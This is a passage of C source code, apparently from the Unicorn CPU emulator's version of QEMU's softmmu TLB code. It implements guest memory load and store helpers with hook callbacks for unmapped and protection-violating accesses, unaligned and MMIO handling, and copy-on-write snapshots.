// qemu_build_not_reached(); return 0; } } static inline uint64_t load_helper(CPUArchState *env, target_ulong addr, TCGMemOpIdx oi, uintptr_t retaddr, MemOp op, bool code_read, FullLoadHelper *full_load) { uintptr_t mmu_idx = get_mmuidx(oi); uintptr_t index = tlb_index(env, mmu_idx, addr); CPUTLBEntry *entry = tlb_entry(env, mmu_idx, addr); target_ulong tlb_addr = code_read ? entry->addr_code : entry->addr_read; target_ulong paddr; const size_t tlb_off = code_read ? offsetof(CPUTLBEntry, addr_code) : offsetof(CPUTLBEntry, addr_read); const MMUAccessType access_type = code_read ? MMU_INST_FETCH : MMU_DATA_LOAD; unsigned a_bits = get_alignment_bits(get_memop(oi)); void *haddr; uint64_t res; size_t size = memop_size(op); int error_code; struct hook *hook; bool handled; HOOK_FOREACH_VAR_DECLARE; struct uc_struct *uc = env->uc; MemoryRegion *mr; /* Handle CPU specific unaligned behaviour */ if (addr & ((1 << a_bits) - 1)) { cpu_unaligned_access(env_cpu(env), addr, access_type, mmu_idx, retaddr); } /* If the TLB entry is for a different page, reload and try again. */ if (!tlb_hit(env->uc, tlb_addr, addr)) { if (!victim_tlb_hit(env, mmu_idx, index, tlb_off, addr & TARGET_PAGE_MASK)) { tlb_fill(env_cpu(env), addr, size, access_type, mmu_idx, retaddr); index = tlb_index(env, mmu_idx, addr); entry = tlb_entry(env, mmu_idx, addr); } tlb_addr = code_read ? entry->addr_code : entry->addr_read; tlb_addr &= ~TLB_INVALID_MASK; } paddr = entry->paddr | (addr & ~TARGET_PAGE_MASK); mr = uc->memory_mapping(uc, paddr); // memory might be still unmapped while reading or fetching if (mr == NULL) { handled = false; // if there is already an unhandled eror, skip callbacks. if (uc->invalid_error == UC_ERR_OK) { if (code_read) { // code fetching error_code = UC_ERR_FETCH_UNMAPPED; HOOK_FOREACH(uc, hook, UC_HOOK_MEM_FETCH_UNMAPPED) { if (hook->to_delete) continue; if (!HOOK_BOUND_CHECK(hook, paddr)) continue; JIT_CALLBACK_GUARD_VAR(handled, ((uc_cb_eventmem_t)hook->callback)(uc, UC_MEM_FETCH_UNMAPPED, paddr, size, 0, hook->user_data)); if (handled) break; // the last callback may already asked to stop emulation if (uc->stop_request) break; } } else { // data reading error_code = UC_ERR_READ_UNMAPPED; HOOK_FOREACH(uc, hook, UC_HOOK_MEM_READ_UNMAPPED) { if (hook->to_delete) continue; if (!HOOK_BOUND_CHECK(hook, paddr)) continue; JIT_CALLBACK_GUARD_VAR(handled, ((uc_cb_eventmem_t)hook->callback)(uc, UC_MEM_READ_UNMAPPED, paddr, size, 0, hook->user_data)); if (handled) break; // the last callback may already asked to stop emulation if (uc->stop_request) break; } } } else { error_code = uc->invalid_error; } if (handled) { uc->invalid_error = UC_ERR_OK; /* If the TLB entry is for a different page, reload and try again. */ if (!tlb_hit(env->uc, tlb_addr, addr)) { if (!victim_tlb_hit(env, mmu_idx, index, tlb_off, addr & TARGET_PAGE_MASK)) { tlb_fill(env_cpu(env), addr, size, access_type, mmu_idx, retaddr); index = tlb_index(env, mmu_idx, addr); entry = tlb_entry(env, mmu_idx, addr); } tlb_addr = code_read ? entry->addr_code : entry->addr_read; tlb_addr &= ~TLB_INVALID_MASK; } paddr = entry->paddr | (addr & ~TARGET_PAGE_MASK); mr = uc->memory_mapping(uc, paddr); if (mr == NULL) { uc->invalid_error = UC_ERR_MAP; if (uc->nested_level > 0 && !uc->cpu->stopped) { cpu_exit(uc->cpu); // XXX(@lazymio): We have to exit early so that the target register won't be overwritten // because qemu might generate tcg code like: // qemu_ld_i64 x0,x1,leq,8 sync: 0 dead: 0 1 // where we don't have a change to recover x0 value cpu_loop_exit(uc->cpu); } return 0; } } else { uc->invalid_addr = paddr; uc->invalid_error = error_code; // printf("***** Invalid fetch (unmapped memory) at " TARGET_FMT_lx "\n", addr); if (uc->nested_level > 0 && !uc->cpu->stopped) { cpu_exit(uc->cpu); // See comments above cpu_loop_exit(uc->cpu); } return 0; } } // now it is read on mapped memory if (!code_read) { // this is date reading HOOK_FOREACH(uc, hook, UC_HOOK_MEM_READ) { if (hook->to_delete) continue; if (!HOOK_BOUND_CHECK(hook, paddr)) continue; JIT_CALLBACK_GUARD(((uc_cb_hookmem_t)hook->callback)(env->uc, UC_MEM_READ, paddr, size, 0, hook->user_data)); // the last callback may already asked to stop emulation if (uc->stop_request) break; } // callback on non-readable memory if (mr != NULL && !(mr->perms & UC_PROT_READ)) { //non-readable handled = false; HOOK_FOREACH(uc, hook, UC_HOOK_MEM_READ_PROT) { if (hook->to_delete) continue; if (!HOOK_BOUND_CHECK(hook, paddr)) continue; JIT_CALLBACK_GUARD_VAR(handled, ((uc_cb_eventmem_t)hook->callback)(uc, UC_MEM_READ_PROT, paddr, size, 0, hook->user_data)); if (handled) break; // the last callback may already asked to stop emulation if (uc->stop_request) break; } if (handled) { uc->invalid_error = UC_ERR_OK; /* If the TLB entry is for a different page, reload and try again. */ if (!tlb_hit(env->uc, tlb_addr, addr)) { if (!victim_tlb_hit(env, mmu_idx, index, tlb_off, addr & TARGET_PAGE_MASK)) { tlb_fill(env_cpu(env), addr, size, access_type, mmu_idx, retaddr); index = tlb_index(env, mmu_idx, addr); entry = tlb_entry(env, mmu_idx, addr); } tlb_addr = code_read ? entry->addr_code : entry->addr_read; tlb_addr &= ~TLB_INVALID_MASK; } } else { uc->invalid_addr = paddr; uc->invalid_error = UC_ERR_READ_PROT; // printf("***** Invalid memory read (non-readable) at " TARGET_FMT_lx "\n", addr); if (uc->nested_level > 0 && !uc->cpu->stopped) { cpu_exit(uc->cpu); // See comments above cpu_loop_exit(uc->cpu); } return 0; } } } else { // code fetching // Unicorn: callback on fetch from NX if (mr != NULL && !(mr->perms & UC_PROT_EXEC)) { // non-executable handled = false; HOOK_FOREACH(uc, hook, UC_HOOK_MEM_FETCH_PROT) { if (hook->to_delete) continue; if (!HOOK_BOUND_CHECK(hook, paddr)) continue; JIT_CALLBACK_GUARD_VAR(handled, ((uc_cb_eventmem_t)hook->callback)(uc, UC_MEM_FETCH_PROT, paddr, size, 0, hook->user_data)); if (handled) break; // the last callback may already asked to stop emulation if (uc->stop_request) break; } if (handled) { uc->invalid_error = UC_ERR_OK; } else { uc->invalid_addr = paddr; uc->invalid_error = UC_ERR_FETCH_PROT; // printf("***** Invalid fetch (non-executable) at " TARGET_FMT_lx "\n", addr); if (uc->nested_level > 0 && !uc->cpu->stopped) { cpu_exit(uc->cpu); // See comments above cpu_loop_exit(uc->cpu); } return 0; } } } /* Handle anything that isn't just a straight memory access. */ if (unlikely(tlb_addr & ~TARGET_PAGE_MASK)) { CPUIOTLBEntry *iotlbentry; bool need_swap; /* For anything that is unaligned, recurse through full_load. */ if ((addr & (size - 1)) != 0) { goto do_unaligned_access; } iotlbentry = &env_tlb(env)->d[mmu_idx].iotlb[index]; /* Handle watchpoints. */ if (unlikely(tlb_addr & TLB_WATCHPOINT)) { /* On watchpoint hit, this will longjmp out. */ cpu_check_watchpoint(env_cpu(env), addr, size, iotlbentry->attrs, BP_MEM_READ, retaddr); } need_swap = size > 1 && (tlb_addr & TLB_BSWAP); /* Handle I/O access. */ if (likely(tlb_addr & TLB_MMIO)) { res = io_readx(env, iotlbentry, mmu_idx, addr, retaddr, access_type, op ^ (need_swap * MO_BSWAP)); goto _out; } haddr = (void *)((uintptr_t)addr + entry->addend); /* * Keep these two load_memop separate to ensure that the compiler * is able to fold the entire function to a single instruction. * There is a build-time assert inside to remind you of this. ;-) */ if (unlikely(need_swap)) { res = load_memop(haddr, op ^ MO_BSWAP); goto _out; } res = load_memop(haddr, op); goto _out; } /* Handle slow unaligned access (it spans two pages or IO). */ if (size > 1 && unlikely((addr & ~TARGET_PAGE_MASK) + size - 1 >= TARGET_PAGE_SIZE)) { target_ulong addr1, addr2; uint64_t r1, r2; unsigned shift; int old_size; do_unaligned_access: addr1 = addr & ~((target_ulong)size - 1); addr2 = addr1 + size; old_size = uc->size_recur_mem; uc->size_recur_mem = size; r1 = full_load(env, addr1, oi, retaddr); r2 = full_load(env, addr2, oi, retaddr); uc->size_recur_mem = old_size; shift = (addr & (size - 1)) * 8; if (memop_big_endian(op)) { /* Big-endian combine. */ res = (r1 << shift) | (r2 >> ((size * 8) - shift)); } else { /* Little-endian combine. */ res = (r1 >> shift) | (r2 << ((size * 8) - shift)); } res = res & MAKE_64BIT_MASK(0, size * 8); goto _out; } haddr = (void *)((uintptr_t)addr + entry->addend); res = load_memop(haddr, op); _out: // Unicorn: callback on successful data read if (!code_read) { if (!uc->size_recur_mem) { // disabling read callback if in recursive call HOOK_FOREACH(uc, hook, UC_HOOK_MEM_READ_AFTER) { if (hook->to_delete) continue; if (!HOOK_BOUND_CHECK(hook, paddr)) continue; JIT_CALLBACK_GUARD(((uc_cb_hookmem_t)hook->callback)(env->uc, UC_MEM_READ_AFTER, paddr, size, res, hook->user_data)); // the last callback may already asked to stop emulation if (uc->stop_request) break; } } } return res; } /* * For the benefit of TCG generated code, we want to avoid the * complication of ABI-specific return type promotion and always * return a value extended to the register size of the host. This is * tcg_target_long, except in the case of a 32-bit host and 64-bit * data, and for that we always have uint64_t. * * We don't bother with this widened value for SOFTMMU_CODE_ACCESS. */ static uint64_t full_ldub_mmu(CPUArchState *env, target_ulong addr, TCGMemOpIdx oi, uintptr_t retaddr) { return load_helper(env, addr, oi, retaddr, MO_UB, false, full_ldub_mmu); } tcg_target_ulong helper_ret_ldub_mmu(CPUArchState *env, target_ulong addr, TCGMemOpIdx oi, uintptr_t retaddr) { return full_ldub_mmu(env, addr, oi, retaddr); } static uint64_t full_le_lduw_mmu(CPUArchState *env, target_ulong addr, TCGMemOpIdx oi, uintptr_t retaddr) { return load_helper(env, addr, oi, retaddr, MO_LEUW, false, full_le_lduw_mmu); } tcg_target_ulong helper_le_lduw_mmu(CPUArchState *env, target_ulong addr, TCGMemOpIdx oi, uintptr_t retaddr) { return full_le_lduw_mmu(env, addr, oi, retaddr); } static uint64_t full_be_lduw_mmu(CPUArchState *env, target_ulong addr, TCGMemOpIdx oi, uintptr_t retaddr) { return load_helper(env, addr, oi, retaddr, MO_BEUW, false, full_be_lduw_mmu); } tcg_target_ulong helper_be_lduw_mmu(CPUArchState *env, target_ulong addr, TCGMemOpIdx oi, uintptr_t retaddr) { return full_be_lduw_mmu(env, addr, oi, retaddr); } static uint64_t full_le_ldul_mmu(CPUArchState *env, target_ulong addr, TCGMemOpIdx oi, uintptr_t retaddr) { return load_helper(env, addr, oi, retaddr, MO_LEUL, false, full_le_ldul_mmu); } tcg_target_ulong helper_le_ldul_mmu(CPUArchState *env, target_ulong addr, TCGMemOpIdx oi, uintptr_t retaddr) { return full_le_ldul_mmu(env, addr, oi, retaddr); } static uint64_t full_be_ldul_mmu(CPUArchState *env, target_ulong addr, TCGMemOpIdx oi, uintptr_t retaddr) { return load_helper(env, addr, oi, retaddr, MO_BEUL, false, full_be_ldul_mmu); } tcg_target_ulong helper_be_ldul_mmu(CPUArchState *env, target_ulong addr, TCGMemOpIdx oi, uintptr_t retaddr) { return full_be_ldul_mmu(env, addr, oi, retaddr); } uint64_t helper_le_ldq_mmu(CPUArchState *env, target_ulong addr, TCGMemOpIdx oi, uintptr_t retaddr) { return load_helper(env, addr, oi, retaddr, MO_LEQ, false, helper_le_ldq_mmu); } uint64_t helper_be_ldq_mmu(CPUArchState *env, target_ulong addr, TCGMemOpIdx oi, uintptr_t retaddr) { return load_helper(env, addr, oi, retaddr, MO_BEQ, false, helper_be_ldq_mmu); } /* * Provide signed versions of the load routines as well. We can of course * avoid this for 64-bit data, or for 32-bit data on 32-bit host. */ tcg_target_ulong helper_ret_ldsb_mmu(CPUArchState *env, target_ulong addr, TCGMemOpIdx oi, uintptr_t retaddr) { return (int8_t)helper_ret_ldub_mmu(env, addr, oi, retaddr); } tcg_target_ulong helper_le_ldsw_mmu(CPUArchState *env, target_ulong addr, TCGMemOpIdx oi, uintptr_t retaddr) { return (int16_t)helper_le_lduw_mmu(env, addr, oi, retaddr); } tcg_target_ulong helper_be_ldsw_mmu(CPUArchState *env, target_ulong addr, TCGMemOpIdx oi, uintptr_t retaddr) { return (int16_t)helper_be_lduw_mmu(env, addr, oi, retaddr); } tcg_target_ulong helper_le_ldsl_mmu(CPUArchState *env, target_ulong addr, TCGMemOpIdx oi, uintptr_t retaddr) { return (int32_t)helper_le_ldul_mmu(env, addr, oi, retaddr); } tcg_target_ulong helper_be_ldsl_mmu(CPUArchState *env, target_ulong addr, TCGMemOpIdx oi, uintptr_t retaddr) { return (int32_t)helper_be_ldul_mmu(env, addr, oi, retaddr); } /* * Load helpers for cpu_ldst.h. */ static inline uint64_t cpu_load_helper(CPUArchState *env, abi_ptr addr, int mmu_idx, uintptr_t retaddr, MemOp op, FullLoadHelper *full_load) // qq { TCGMemOpIdx oi; uint64_t ret; op &= ~MO_SIGN; oi = make_memop_idx(op, mmu_idx); ret = full_load(env, addr, oi, retaddr); return ret; } uint32_t cpu_ldub_mmuidx_ra(CPUArchState *env, abi_ptr addr, int mmu_idx, uintptr_t ra) { return cpu_load_helper(env, addr, mmu_idx, ra, MO_UB, full_ldub_mmu); } int cpu_ldsb_mmuidx_ra(CPUArchState *env, abi_ptr addr, int mmu_idx, uintptr_t ra) { return (int8_t)cpu_load_helper(env, addr, mmu_idx, ra, MO_SB, full_ldub_mmu); } uint32_t cpu_lduw_mmuidx_ra(CPUArchState *env, abi_ptr addr, int mmu_idx, uintptr_t ra) { return cpu_load_helper(env, addr, mmu_idx, ra, MO_TEUW, MO_TE == MO_LE ? full_le_lduw_mmu : full_be_lduw_mmu); } int cpu_ldsw_mmuidx_ra(CPUArchState *env, abi_ptr addr, int mmu_idx, uintptr_t ra) { return (int16_t)cpu_load_helper(env, addr, mmu_idx, ra, MO_TESW, MO_TE == MO_LE ? full_le_lduw_mmu : full_be_lduw_mmu); } uint32_t cpu_ldl_mmuidx_ra(CPUArchState *env, abi_ptr addr, int mmu_idx, uintptr_t ra) { return cpu_load_helper(env, addr, mmu_idx, ra, MO_TEUL, MO_TE == MO_LE ? full_le_ldul_mmu : full_be_ldul_mmu); } uint64_t cpu_ldq_mmuidx_ra(CPUArchState *env, abi_ptr addr, int mmu_idx, uintptr_t ra) { return cpu_load_helper(env, addr, mmu_idx, ra, MO_TEQ, MO_TE == MO_LE ? helper_le_ldq_mmu : helper_be_ldq_mmu); } uint32_t cpu_ldub_data_ra(CPUArchState *env, target_ulong ptr, uintptr_t retaddr) { return cpu_ldub_mmuidx_ra(env, ptr, cpu_mmu_index(env, false), retaddr); } int cpu_ldsb_data_ra(CPUArchState *env, target_ulong ptr, uintptr_t retaddr) { return cpu_ldsb_mmuidx_ra(env, ptr, cpu_mmu_index(env, false), retaddr); } uint32_t cpu_lduw_data_ra(CPUArchState *env, target_ulong ptr, uintptr_t retaddr) { return cpu_lduw_mmuidx_ra(env, ptr, cpu_mmu_index(env, false), retaddr); } int cpu_ldsw_data_ra(CPUArchState *env, target_ulong ptr, uintptr_t retaddr) { return cpu_ldsw_mmuidx_ra(env, ptr, cpu_mmu_index(env, false), retaddr); } uint32_t cpu_ldl_data_ra(CPUArchState *env, target_ulong ptr, uintptr_t retaddr) { return cpu_ldl_mmuidx_ra(env, ptr, cpu_mmu_index(env, false), retaddr); } uint64_t cpu_ldq_data_ra(CPUArchState *env, target_ulong ptr, uintptr_t retaddr) { return cpu_ldq_mmuidx_ra(env, ptr, cpu_mmu_index(env, false), retaddr); } uint32_t cpu_ldub_data(CPUArchState *env, target_ulong ptr) { return cpu_ldub_data_ra(env, ptr, 0); } int cpu_ldsb_data(CPUArchState *env, target_ulong ptr) { return cpu_ldsb_data_ra(env, ptr, 0); } uint32_t cpu_lduw_data(CPUArchState *env, target_ulong ptr) { return cpu_lduw_data_ra(env, ptr, 0); } int cpu_ldsw_data(CPUArchState *env, target_ulong ptr) { return cpu_ldsw_data_ra(env, ptr, 0); } uint32_t cpu_ldl_data(CPUArchState *env, target_ulong ptr) { return cpu_ldl_data_ra(env, ptr, 0); } uint64_t cpu_ldq_data(CPUArchState *env, target_ulong ptr) { return cpu_ldq_data_ra(env, ptr, 0); } /* * Store Helpers */ static inline void store_memop(void *haddr, uint64_t val, MemOp op) { switch (op) { case MO_UB: stb_p(haddr, val); break; case MO_BEUW: stw_be_p(haddr, val); break; case MO_LEUW: stw_le_p(haddr, val); break; case MO_BEUL: stl_be_p(haddr, val); break; case MO_LEUL: stl_le_p(haddr, val); break; case MO_BEQ: stq_be_p(haddr, val); break; case MO_LEQ: stq_le_p(haddr, val); break; default: // qemu_build_not_reached(); break; } } static inline void store_helper(CPUArchState *env, target_ulong addr, uint64_t val, TCGMemOpIdx oi, uintptr_t retaddr, MemOp op) { struct uc_struct *uc = env->uc; HOOK_FOREACH_VAR_DECLARE; uintptr_t mmu_idx = get_mmuidx(oi); uintptr_t index = tlb_index(env, mmu_idx, addr); CPUTLBEntry *entry = tlb_entry(env, mmu_idx, addr); target_ulong tlb_addr = tlb_addr_write(entry); target_ulong paddr; const size_t tlb_off = offsetof(CPUTLBEntry, addr_write); unsigned a_bits = get_alignment_bits(get_memop(oi)); void *haddr; size_t size = memop_size(op); struct hook *hook; bool handled; MemoryRegion *mr; /* Handle CPU specific unaligned behaviour */ if (addr & ((1 << a_bits) - 1)) { cpu_unaligned_access(env_cpu(env), addr, MMU_DATA_STORE, mmu_idx, retaddr); } /* If the TLB entry is for a different page, reload and try again. */ if (!tlb_hit(env->uc, tlb_addr, addr)) { if (!victim_tlb_hit(env, mmu_idx, index, tlb_off, addr & TARGET_PAGE_MASK)) { tlb_fill(env_cpu(env), addr, size, MMU_DATA_STORE, mmu_idx, retaddr); index = tlb_index(env, mmu_idx, addr); entry = tlb_entry(env, mmu_idx, addr); } tlb_addr = tlb_addr_write(entry) & ~TLB_INVALID_MASK; } // Load the latest memory mapping. paddr = entry->paddr | (addr & ~TARGET_PAGE_MASK); mr = uc->memory_mapping(uc, paddr); if (!uc->size_recur_mem) { // disabling write callback if in recursive call // Unicorn: callback on memory write HOOK_FOREACH(uc, hook, UC_HOOK_MEM_WRITE) { if (hook->to_delete) continue; if (!HOOK_BOUND_CHECK(hook, paddr)) continue; JIT_CALLBACK_GUARD(((uc_cb_hookmem_t)hook->callback)(uc, UC_MEM_WRITE, paddr, size, val, hook->user_data)); // the last callback may already asked to stop emulation if (uc->stop_request) break; } } // Unicorn: callback on invalid memory if (mr == NULL) { handled = false; HOOK_FOREACH(uc, hook, UC_HOOK_MEM_WRITE_UNMAPPED) { if (hook->to_delete) continue; if (!HOOK_BOUND_CHECK(hook, paddr)) continue; JIT_CALLBACK_GUARD_VAR(handled, ((uc_cb_eventmem_t)hook->callback)(uc, UC_MEM_WRITE_UNMAPPED, paddr, size, val, hook->user_data)); if (handled) break; // the last callback may already asked to stop emulation if (uc->stop_request) break; } if (!handled) { // save error & quit uc->invalid_addr = paddr; uc->invalid_error = UC_ERR_WRITE_UNMAPPED; // printf("***** Invalid memory write at " TARGET_FMT_lx "\n", addr); cpu_exit(uc->cpu); return; } else { uc->invalid_error = UC_ERR_OK; /* If the TLB entry is for a different page, reload and try again. */ if (!tlb_hit(env->uc, tlb_addr, addr)) { if (!victim_tlb_hit(env, mmu_idx, index, tlb_off, addr & TARGET_PAGE_MASK)) { tlb_fill(env_cpu(env), addr, size, MMU_DATA_STORE, mmu_idx, retaddr); index = tlb_index(env, mmu_idx, addr); entry = tlb_entry(env, mmu_idx, addr); } tlb_addr = tlb_addr_write(entry) & ~TLB_INVALID_MASK; } paddr = entry->paddr | (addr & ~TARGET_PAGE_MASK); mr = uc->memory_mapping(uc, paddr); if (mr == NULL) { uc->invalid_error = UC_ERR_MAP; cpu_exit(uc->cpu); return; } } } // Unicorn: callback on non-writable memory if (mr != NULL && !(mr->perms & UC_PROT_WRITE)) { //non-writable // printf("not writable memory???\n"); handled = false; HOOK_FOREACH(uc, hook, UC_HOOK_MEM_WRITE_PROT) { if (hook->to_delete) continue; if (!HOOK_BOUND_CHECK(hook, paddr)) continue; JIT_CALLBACK_GUARD_VAR(handled, ((uc_cb_eventmem_t)hook->callback)(uc, UC_MEM_WRITE_PROT, paddr, size, val, hook->user_data)); if (handled) break; // the last callback may already asked to stop emulation if (uc->stop_request) break; } if (handled) { /* If the TLB entry is for a different page, reload and try again. */ if (!tlb_hit(env->uc, tlb_addr, addr)) { if (!victim_tlb_hit(env, mmu_idx, index, tlb_off, addr & TARGET_PAGE_MASK)) { tlb_fill(env_cpu(env), addr, size, MMU_DATA_STORE, mmu_idx, retaddr); index = tlb_index(env, mmu_idx, addr); entry = tlb_entry(env, mmu_idx, addr); } tlb_addr = tlb_addr_write(entry) & ~TLB_INVALID_MASK; } uc->invalid_error = UC_ERR_OK; } else { uc->invalid_addr = paddr; uc->invalid_error = UC_ERR_WRITE_PROT; // printf("***** Invalid memory write (ro) at " TARGET_FMT_lx "\n", addr); cpu_exit(uc->cpu); return; } } if (uc->snapshot_level && mr->ram && mr->priority < uc->snapshot_level) { mr = memory_cow(uc, mr, paddr & TARGET_PAGE_MASK, TARGET_PAGE_SIZE); if (!mr) { uc->invalid_addr = paddr; uc->invalid_error = UC_ERR_NOMEM; cpu_exit(uc->cpu); return; } /* refill tlb after CoW */ tlb_fill(env_cpu(env), addr, size, MMU_DATA_STORE, mmu_idx, retaddr); index = tlb_index(env, mmu_idx, addr); entry = tlb_entry(env, mmu_idx, addr); tlb_addr = tlb_addr_write(entry); } /* Handle anything that isn't just a straight memory access. */ if (unlikely(tlb_addr & ~TARGET_PAGE_MASK)) { CPUIOTLBEntry *iotlbentry; bool need_swap; /* For anything that is unaligned, recurse through byte stores. */ if ((addr & (size - 1)) != 0) { goto do_unaligned_access; } iotlbentry = &env_tlb(env)->d[mmu_idx].iotlb[index]; /* Handle watchpoints. */ if (unlikely(tlb_addr & TLB_WATCHPOINT)) { /* On watchpoint hit, this will longjmp out. */ cpu_check_watchpoint(env_cpu(env), addr, size, iotlbentry->attrs, BP_MEM_WRITE, retaddr); } need_swap = size > 1 && (tlb_addr & TLB_BSWAP); /* Handle I/O access. */ if (tlb_addr & TLB_MMIO) { io_writex(env, iotlbentry, mmu_idx, val, addr, retaddr, op ^ (need_swap * MO_BSWAP)); return; } /* Ignore writes to ROM. */ if (unlikely(tlb_addr & TLB_DISCARD_WRITE)) { return; } /* Handle clean RAM pages. */ if (tlb_addr & TLB_NOTDIRTY) { notdirty_write(env_cpu(env), addr, size, iotlbentry, retaddr, mr); } haddr = (void *)((uintptr_t)addr + entry->addend); /* * Keep these two store_memop separate to ensure that the compiler * is able to fold the entire function to a single instruction. * There is a build-time assert inside to remind you of this. ;-) */ if (unlikely(need_swap)) { store_memop(haddr, val, op ^ MO_BSWAP); } else { store_memop(haddr, val, op); } return; } /* Handle slow unaligned access (it spans two pages or IO). */ if (size > 1 && unlikely((addr & ~TARGET_PAGE_MASK) + size - 1 >= TARGET_PAGE_SIZE)) { int i; uintptr_t index2; CPUTLBEntry *entry2; target_ulong page2, tlb_addr2; size_t size2; int old_size; do_unaligned_access: /* * Ensure the second page is in the TLB. Note that the first page * is already guaranteed to be filled, and that the second page * cannot evict the first. */ page2 = (addr + size) & TARGET_PAGE_MASK; size2 = (addr + size) & ~TARGET_PAGE_MASK; index2 = tlb_index(env, mmu_idx, page2); entry2 = tlb_entry(env, mmu_idx, page2); tlb_addr2 = tlb_addr_write(entry2); if (!tlb_hit_page(uc, tlb_addr2, page2)) { if (!victim_tlb_hit(env, mmu_idx, index2, tlb_off, page2)) { tlb_fill(env_cpu(env), page2, size2, MMU_DATA_STORE, mmu_idx, retaddr); index2 = tlb_index(env, mmu_idx, page2); entry2 = tlb_entry(env, mmu_idx, page2); } tlb_addr2 = tlb_addr_write(entry2); } /* * Handle watchpoints. Since this may trap, all checks * must happen before any store. */ if (unlikely(tlb_addr & TLB_WATCHPOINT)) { cpu_check_watchpoint(env_cpu(env), addr, size - size2, env_tlb(env)->d[mmu_idx].iotlb[index].attrs, BP_MEM_WRITE, retaddr); } if (unlikely(tlb_addr2 & TLB_WATCHPOINT)) { cpu_check_watchpoint(env_cpu(env), page2, size2, env_tlb(env)->d[mmu_idx].iotlb[index2].attrs, BP_MEM_WRITE, retaddr); } /* * XXX: not efficient, but simple. * This loop must go in the forward direction to avoid issues * with self-modifying code in Windows 64-bit. */ old_size = uc->size_recur_mem; uc->size_recur_mem = size; for (i = 0; i < size; ++i) { uint8_t val8; if (memop_big_endian(op)) { /* Big-endian extract. */ val8 = val >> (((size - 1) * 8) - (i * 8)); } else { /* Little-endian extract. */ val8 = val >> (i * 8); } helper_ret_stb_mmu(env, addr + i, val8, oi, retaddr); } uc->size_recur_mem = old_size; return; } haddr = (void *)((uintptr_t)addr + entry->addend); store_memop(haddr, val, op); } void helper_ret_stb_mmu(CPUArchState *env, target_ulong addr, uint8_t val, TCGMemOpIdx oi, uintptr_t retaddr) { store_helper(env, addr, val, oi, retaddr, MO_UB); } void helper_le_stw_mmu(CPUArchState *env, target_ulong addr, uint16_t val, TCGMemOpIdx oi, uintptr_t retaddr) { store_helper(env, addr, val, oi, retaddr, MO_LEUW); } void helper_be_stw_mmu(CPUArchState *env, target_ulong addr, uint16_t val, TCGMemOpIdx oi, uintptr_t retaddr) { store_helper(env, addr, val, oi, retaddr, MO_BEUW); } void helper_le_stl_mmu(CPUArchState *env, target_ulong addr, uint32_t val, TCGMemOpIdx oi, uintptr_t retaddr) { store_helper(env, addr, val, oi, retaddr, MO_LEUL); } void helper_be_stl_mmu(CPUArchState *env, target_ulong addr, uint32_t val, TCGMemOpIdx oi, uintptr_t retaddr) { store_helper(env, addr, val, oi, retaddr, MO_BEUL); } void helper_le_stq_mmu(CPUArchState *env, target_ulong addr, uint64_t val, TCGMemOpIdx oi, uintptr_t retaddr) { store_helper(env, addr, val, oi, retaddr, MO_LEQ); } void helper_be_stq_mmu(CPUArchState *env, target_ulong addr, uint64_t val, TCGMemOpIdx oi, uintptr_t retaddr) { store_helper(env, addr, val, oi, retaddr, MO_BEQ); } /* * Store Helpers for cpu_ldst.h */ static inline void cpu_store_helper(CPUArchState *env, target_ulong addr, uint64_t val, int mmu_idx, uintptr_t retaddr, MemOp op) // qq { TCGMemOpIdx oi; oi = make_memop_idx(op, mmu_idx); store_helper(env, addr, val, oi, retaddr, op); } void cpu_stb_mmuidx_ra(CPUArchState *env, target_ulong addr, uint32_t val, int mmu_idx, uintptr_t retaddr) { cpu_store_helper(env, addr, val, mmu_idx, retaddr, MO_UB); } void cpu_stw_mmuidx_ra(CPUArchState *env, target_ulong addr, uint32_t val, int mmu_idx, uintptr_t retaddr) { cpu_store_helper(env, addr, val, mmu_idx, retaddr, MO_TEUW); } void cpu_stl_mmuidx_ra(CPUArchState *env, target_ulong addr, uint32_t val, int mmu_idx, uintptr_t retaddr) { cpu_store_helper(env, addr, val, mmu_idx, retaddr, MO_TEUL); } void cpu_stq_mmuidx_ra(CPUArchState *env, target_ulong addr, uint64_t val, int mmu_idx, uintptr_t retaddr) { cpu_store_helper(env, addr, val, mmu_idx, retaddr, MO_TEQ); } void cpu_stb_data_ra(CPUArchState *env, target_ulong ptr, uint32_t val, uintptr_t retaddr) { cpu_stb_mmuidx_ra(env, ptr, val, cpu_mmu_index(env, false), retaddr); } void cpu_stw_data_ra(CPUArchState *env, target_ulong ptr, uint32_t val, uintptr_t retaddr) { cpu_stw_mmuidx_ra(env, ptr, val, cpu_mmu_index(env, false), retaddr); } void cpu_stl_data_ra(CPUArchState *env, target_ulong ptr, uint32_t val, uintptr_t retaddr) { cpu_stl_mmuidx_ra(env, ptr, val, cpu_mmu_index(env, false), retaddr); } void cpu_stq_data_ra(CPUArchState *env, target_ulong ptr, uint64_t val, uintptr_t retaddr) { cpu_stq_mmuidx_ra(env, ptr, val, cpu_mmu_index(env, false), retaddr); } void cpu_stb_data(CPUArchState *env, target_ulong ptr, uint32_t val) { cpu_stb_data_ra(env, ptr, val, 0); } void cpu_stw_data(CPUArchState *env, target_ulong ptr, uint32_t val) { cpu_stw_data_ra(env, ptr, val, 0); } void cpu_stl_data(CPUArchState *env, target_ulong ptr, uint32_t val) { cpu_stl_data_ra(env, ptr, val, 0); } void cpu_stq_data(CPUArchState *env, target_ulong ptr, uint64_t val) { cpu_stq_data_ra(env, ptr, val, 0); } /* First set of helpers allows passing in of OI and RETADDR. This makes them callable from other helpers. */ #define EXTRA_ARGS , TCGMemOpIdx oi, uintptr_t retaddr #define ATOMIC_NAME(X) \ HELPER(glue(glue(glue(atomic_ ## X, SUFFIX), END), _mmu)) #define ATOMIC_MMU_DECLS #define ATOMIC_MMU_LOOKUP atomic_mmu_lookup(env, addr, oi, retaddr) #define ATOMIC_MMU_CLEANUP #define ATOMIC_MMU_IDX get_mmuidx(oi) #define DATA_SIZE 1 #include "atomic_template.h" #define DATA_SIZE 2 #include "atomic_template.h" #define DATA_SIZE 4 #include "atomic_template.h" #ifdef CONFIG_ATOMIC64 #define DATA_SIZE 8 #include "atomic_template.h" #endif #if HAVE_CMPXCHG128 || HAVE_ATOMIC128 #define DATA_SIZE 16 #include "atomic_template.h" #endif /* Second set of helpers are directly callable from TCG as helpers. */ #undef EXTRA_ARGS #undef ATOMIC_NAME #undef ATOMIC_MMU_LOOKUP #define EXTRA_ARGS , TCGMemOpIdx oi #define ATOMIC_NAME(X) HELPER(glue(glue(atomic_ ## X, SUFFIX), END)) #define ATOMIC_MMU_LOOKUP atomic_mmu_lookup(env, addr, oi, GETPC()) #define DATA_SIZE 1 #include "atomic_template.h" #define DATA_SIZE 2 #include "atomic_template.h" #define DATA_SIZE 4 #include "atomic_template.h" #ifdef CONFIG_ATOMIC64 #define DATA_SIZE 